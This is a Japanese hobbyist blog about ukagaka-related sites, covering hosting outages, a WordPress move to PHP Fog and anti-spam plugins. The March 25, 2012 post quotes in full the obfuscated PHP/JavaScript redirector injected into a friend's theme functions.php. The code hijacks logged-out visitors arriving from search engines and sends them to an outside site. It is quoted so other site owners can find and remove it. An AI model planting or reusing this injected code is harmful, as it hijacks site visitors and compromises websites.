May 12, 2012 - by Don

SoSiReMiのクロックラビットのネットワーク更新がtimeoutとなっていたので、管理者権限で一旦削除してもう一度アップロードし直しました。現在はtimeoutが解消していることを確認しました。

以前のアクセス解析結果も全て削除されてしまいましたが、ご了承お願いします。申し訳ありません。

April 29, 2012 - by Don

昨日の11:00 – 16:00頃、SoSiReMiの一部のページが表示されていませんでした。原因はGoogle App Engineの無料APIリソースを消費し尽くしたことによるものです。本日も、これを書いている1:00頃、既に無料枠の70%近くを消費しており、昨日よりも早い時間にサイトが表示されなくなることが予想されます。

今後の予定

内部の設計に無駄が多いことは自覚しているので、設計を最適化してサイトを作り直すことを考えています。ただ、そう短期間では無理です(SiReFaSoの時は数ヶ月かかった…)。それまでの間は、時々サイトが表示されない状態が続くと思います。ご利用中のユーザ・ゴーストマスタの方々には大変ご不便をおかけしますが、ご理解の程宜しくお願いいたします。

新規登録直後でPV数が多いことによる一時的なものと信じたい…ですが、急いで何とかしたいところです。

追記

主にアクセス解析でリソースを消費しているのですが、上限まで達したらアクセス解析を非表示にすることで、継続利用が可能となりました。ダウンロードやネットワーク更新は問題なくできると思います。

March 25, 2012 - by Don

名前これで合ってるのかわかりませんけど…。

@yusura さんのブログ「青はココル」（あえてリンクは張りません）がマルウェアに感染していた模様です。「サイトにアクセスするとAvastがJS:Redirector-MR [Trj]というトロイの木馬の警告を出してきます」という連絡があったそうで、実際に怪しいコードが埋め込まれていました。

動作としては、「ページが表示された数秒後にアダルトサイトにジャンプする」ということが確認されたそうですが、他にどんな影響があるかわかりません。上記の現象を確認した場合は、念のためウイルススキャンを実行し、サイト管理者の方は自分のサイトが改竄されていないかご確認頂いた方が良さそうです。

「青はココル」は現在、下記の記事を参考に埋めこまれたスクリプトを削除した上で、メンテナンスモードになっております。

• またwordpressにjs.Redirector – MR [TRJ]　(´･ω･`；) | さばねこ日記

使用してるテーマのfunctions.phpの一番最後に、

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!?scounter?>';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c?)r[e(c)]=k||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c?)if(k)p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||

er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
}
}
}
?>

今回はこんな文字列が埋め込まれてました
参考になさってください。
ﾃｰﾏの編集で削除し更新でOKでした。

おまけ

WordPressを攻撃対象としているみたいですし、このサイトもWordPressなので一応確認してみましたが、大丈夫でした。

ついでに、伺か関係でWordPressを利用していると思しきサイトを幾つか見てみました。(2012-03-25 現在)
以下のサイトは大丈夫のようです。

• かけら工房
• 霊界通信
• 食卓塩
• Ruezelmayer – Weblog
• しろみつ（仮）
• 仮想冥界・伺か別館
• 26ですが何か | MTBと何か/伺かに関する色々なこと
• __雑記

以下のサイトは500 Internal Server Error となっていました。まさか、PHPが改竄されて…とか考えるとちょっと心配です。（リンクは張りません）

• アヤチノオト

参考

• Gumblar – Wikipedia

March 11, 2012 - by Don

ついっとゅう4.0リリース

今日の14:47についっとゅうのサーバの転送量が1GBを超え、使用不能になっていました(17:00から無料枠転送量がリセットされ、再び使用可能となりました)。

しばらく放置気味でしたが、じわじわと利用者が増えているようです。当該サーバには他にもはいくゅうや各種Twitter Botなどを動かしているので、全滅は免れないといけません。

そこで、利用者が好きなサーバを指定できるようについっとゅうを更新しました。とりあえずcloudControlに１つプロキシサーバを立てましたので、ご利用の方は設定画面からついっとゅう配布元に記載してあるURLを入力してください。

サーバとOAuthキーを自前で用意する気概のある方は、是非チャレンジしてみてください。

宣伝

上記と関係無いですけど、もどき板が移転したみたいです。

March 5, 2012 - by Don

えんいーアンテナが管理終了されたそうです。家の鍵を道路の真ん中に置いておくようなことをされていてかなりビビったので、とりあえず拾っておきました。長らくお疲れ様でした。

もしご覧になっていましたら、メアド変更手続きをお願いします。

私自身は管理を継続する意志が無いので、管理を引き継がれる方をこの記事のコメント欄で募集します。
４月まで現れない場合は、責任をもってアカウントを停止いたします。

February 5, 2012 - by Don

cloudControlでファイルの書き込みができなくなるそうです。

• cloudControl » Cloud App Platform » Documentation: Platform Constraints

スケーラビリティの確保のためならば仕方がないですが、このWordPressで動的ファイル生成やファイルのアップロードができなくなるのは困ります。そこで、PHPのPaaSで有名なPHP Fogへ移転することにしました。

WordPressの引越しメモ

なにぶんWordPressの引越しは初めてなもので、色々とつまづいた点を記録しておきます。

インストール

PHP Fogでは、アプリケーション新規作成の際にWordPressを選択できます。

これで既にWordPressがインストールされた状態となり、すぐに使用出来ます。素敵！

プラグインとテーマをアップロード

今まで使っていたプラグインやテーマを移行するために、Gitでソースを取得します。SSH Keysの設定は適当に終わってるものとします。

$ git clone git@git01.phpfog.com:example.phpfogapp.com

今まで使っていたプラグインの他にもう一つ、移行のためにインストールしておきます。

• WordPress Importer

データのインポートのためのプラグインのようです。

ところで、PHP FogはGitでpushするだけでデプロイまでしてくれて便利です。専用のツールまでインストールさせた挙句デプロイも手動なcloudControlとは格が違いますね！

$ git push

エクスポート

いままでのWordPressのデータをダッシュボードからエクスポートします。

インポート

新しいサイトでインポートします。

ここで気が付きましたが、"\"がエスケープされていなくて、\0とか書いていたものがひどいことに…。phpmyadminからsqlでエクスポートして置換してから再度インポートしました。

設定

各種設定をします。個々のプラグインの設定も忘れずに。

ファイルマネージャ

Gitしかファイルのやりとりをするツールがないのでは、動的に書き出されたファイルの管理ができません。そこで念のため、ファイルマネージャを入れておきます。

今回はPHP Navigatorを入れてみました。config.phpを適宜編集して、Gitでソースに含めてpush。

転送

あとは.htaccessで旧サイトからリダイレクトすれば完了です。

Redirect permanent / http://example.phpfogapp.com/

普通はこれでいいのですが、特定のディレクトリだけは転送せず残しておきたいという事情があったので、fooディレクトリを除外します。

RedirectMatch permanent ^/(((?!foo).)*)$ http://exapmle.phpfogapp.com/$1

これで転送の設定が完了です。

雑感

デフォルトでインストールされているWordPressは英語なので、馴染まない人は日本語のものに入れ替えたほうがいいかもしれません。

あと、時々502エラーが出るのが気になりますね。ロードバランサーのnginxの調子が悪いのかな？

January 18, 2012 - by Don

昨年末あたりから英文のトラックバックスパムが来るようになってしまいました。その対策のために導入したWordPressプラグインをご紹介します。

Simple Trackback Validation

検索でヒット率が高いので導入してみたトラックバックスパム対策専用プラグイン。仕組みは、トラックバック元のサイトに自サイトへのリンクが張られていない場合はSPAMとみなす、という単純なものです。これだけでもかなりの割合のSPAMを弾けるのですが、律儀に自サイトへのリンクを張ってくれているSPAMは弾けません。実際にそういうSPAMも来ています。

また、最終更新日が2007年というのも不安要素です。一応、WordPress/3.3でも動いているようですが。

Throws SPAM Away

日本語を含まないコメントを弾く、コメント専用SPAM対策プラグイン。…でしたが、バージョン1.5からはトラックバックに対しても同様の規制が可能となりました。さらに、Simple Trackback Validationと同様に、自サイトへのリンクによる言及がないかチェックする機能もついています。というわけで、Simple Trackback Validationは無効化してThrows SPAM Awayに移行してみました。

実は、トラックバックスパムへの対応は私がThrows SPAM Awayの作者様に検討をお願いしていたものなのです。お忙しい中、要望に応えて頂きました製作者のさとう様に、この場を借りて御礼申し上げます。ありがとうございました。

January 14, 2012 - by Don

前回作ったDirectSSTP送信プログラムがあまりにもひどい出来だったので、修正しました。

ついでにレスポンスの表示を追加。プロパティシステムのデバッグなんかもできると思います。

dsstp_1_1_0.zip

2012-01-15 追記

本体フリーズさせるとか。バグってますね。直しました。

dsstphsp_1_2_0.zip

January 3, 2012 - by Don

あけましておめでとうございます。

３年くらい前に"今年こそはSAORIを作る"みたいなことを書いていて未だ達成できていないので、今年もそれでいこうと思います。

December 28, 2011 - by Don

とある事情により３日前からHSPを勉強しています。

なんとか使い方にも慣れてきて、習作としてDirectSSTPを送信するモジュールを作ってみたので晒してみます。

dsstphsp.zip

起動のタイミングによっては送信できないこともあるので何かバグってるんだと思います。よくわかりません。

今年も残り少なくなって参りました。来年もまた良い年になるといいですね。